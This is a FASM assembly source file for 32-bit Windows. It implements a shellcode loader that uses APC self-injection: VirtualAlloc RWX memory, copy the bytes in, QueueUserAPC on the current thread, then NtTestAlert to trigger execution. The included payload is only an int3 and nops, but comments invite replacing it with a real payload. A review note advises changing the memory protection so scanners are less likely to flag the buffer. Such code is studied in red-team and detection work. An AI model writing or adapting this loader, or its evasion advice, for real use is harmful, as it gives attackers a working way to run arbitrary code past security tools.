; apc_injection.asm - FASM source, 32-bit Windows PE (Intel syntax, FASM
; directives; `format PE` implies 32-bit code).
;
; Minimal self-injection PoC: allocate an executable buffer, copy the
; `shellcode` bytes from .data into it, queue the buffer as a user-mode APC
; on the current thread (QueueUserAPC) and drain the queue with NtTestAlert
; so the payload runs without waiting for an alertable state. Everything
; happens inside this process: no remote process or thread is opened.
;
; ABI: all calls go through the import table (`call [Name]`) using Win32
; stdcall - arguments pushed right-to-left, callee pops them, ebx/esi/edi/ebp
; preserved across calls. PAGE_* / MEM_* constants are not defined here and
; are expected to come from win32w.inc.
format PE GUI 4.0
entry main
include 'win32w.inc'
section '.code' readable executable
; **************************************************
; * Code
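; main - program entry point. Nothing to return to; every path ends in
; ExitProcess.
;
; Flow: VirtualAlloc an executable buffer -> copy `shellcode` into it ->
; QueueUserAPC(buffer) on the current thread -> NtTestAlert to deliver it.
;
; Register roles (Win32 stdcall: ebx/esi/edi survive the calls, eax/ecx/edx
; do not):
;   esi = base of the allocated buffer     ebx = current-thread pseudo-handle
;   edi/ecx = rep movsb destination/count  eax = scratch / return values
;
; Exit code: 0 when every call succeeded and NtTestAlert returned,
;            1 when VirtualAlloc or QueueUserAPC reported failure.
; (The original exited 1 on both paths, which made the two failure checks
; unobservable from outside the process.)
; NOTE(review): the failure path does not call GetLastError; add it before
; ExitProcess if the reason matters.
main:
        ; VirtualAlloc(NULL, shellcode_length, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
        ; NOTE(review): a private RWX commit is the easiest thing for a
        ; memory scanner to flag. If the payload does not write to itself
        ; (many encoded / self-decoding stubs do), prefer PAGE_READWRITE here,
        ; copy, then VirtualProtect to PAGE_EXECUTE_READ before queueing.
        xor     eax, eax                        ; lpAddress = NULL: let the kernel pick
        push    PAGE_EXECUTE_READWRITE          ; VirtualAlloc.flProtect
        push    MEM_COMMIT or MEM_RESERVE       ; VirtualAlloc.flAllocationType
        push    [shellcode_length]              ; VirtualAlloc.dwSize
        push    eax                             ; VirtualAlloc.lpAddress
        call    [VirtualAlloc]
        test    eax, eax
        jz      exit                            ; NULL -> allocation failed

        ; memcpy(buffer, shellcode, shellcode_length)
        mov     edi, eax                        ; destination = buffer
        mov     esi, shellcode                  ; source = payload bytes in .data
        mov     ecx, [shellcode_length]         ; byte count
        cld                                     ; forward copy; DF is clear at entry per ABI, made explicit
        rep     movsb
        mov     esi, eax                        ; esi = buffer base (rep movsb does not touch eax)

        ; GetCurrentThread() - pseudo-handle for this thread, no CloseHandle needed
        call    [GetCurrentThread]
        mov     ebx, eax

        ; QueueUserAPC(pfnAPC = buffer, hThread = current thread, dwData = 0)
        ; The payload is entered as PAPCFUNC(dwData), stdcall; a payload that
        ; returns instead of exiting must clean up that one argument (ret 4).
        xor     eax, eax
        push    eax                             ; QueueUserAPC.dwData
        push    ebx                             ; QueueUserAPC.hThread
        push    esi                             ; QueueUserAPC.pfnAPC
        call    [QueueUserAPC]
        test    eax, eax
        jz      exit                            ; 0 -> queueing failed

        ; NtTestAlert() (undocumented ntdll export) - delivers the user-mode
        ; APCs pending on this thread right now, without an alertable wait.
        ; This is the call that actually runs the payload; control only comes
        ; back here if the payload returns.
        call    [NtTestAlert]
        xor     eax, eax
        push    eax                             ; ExitProcess.uExitCode = 0 (success)
        call    [ExitProcess]

exit:
        ; Reached only when VirtualAlloc or QueueUserAPC failed.
        push    1                               ; ExitProcess.uExitCode = 1 (failure)
        call    [ExitProcess]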
; **************************************************
; * Data
section '.data' data readable
; Placeholder payload: int3 (traps, so the landing is visible under a
; debugger) followed by four nops. Replace these bytes with the real payload;
; shellcode_length is computed by the assembler from the bytes that precede
; it, so nothing else needs editing.
shellcode:
        db      0CCh                            ; int3
        db      90h, 90h, 90h, 90h              ; nop x4
shellcode_length dd $ - shellcode               ; byte count of the payload above
; **************************************************
; * Imports
section '.idata' import data readable
; Import table. The loader fills the IAT slots; the code calls through them
; with `call [Name]`.
library kernel32, 'KERNEL32.dll',\
ntdll, 'NTDLL.DLL'
; kernel32: buffer allocation, thread pseudo-handle, APC queueing, exit.
import kernel32,\
ExitProcess, 'ExitProcess',\
GetCurrentThread, 'GetCurrentThread',\
QueueUserAPC, 'QueueUserAPC',\
VirtualAlloc, 'VirtualAlloc'
; ntdll: NtTestAlert is not exported by kernel32, hence the direct import.
import ntdll,\
NtTestAlert, 'NtTestAlert'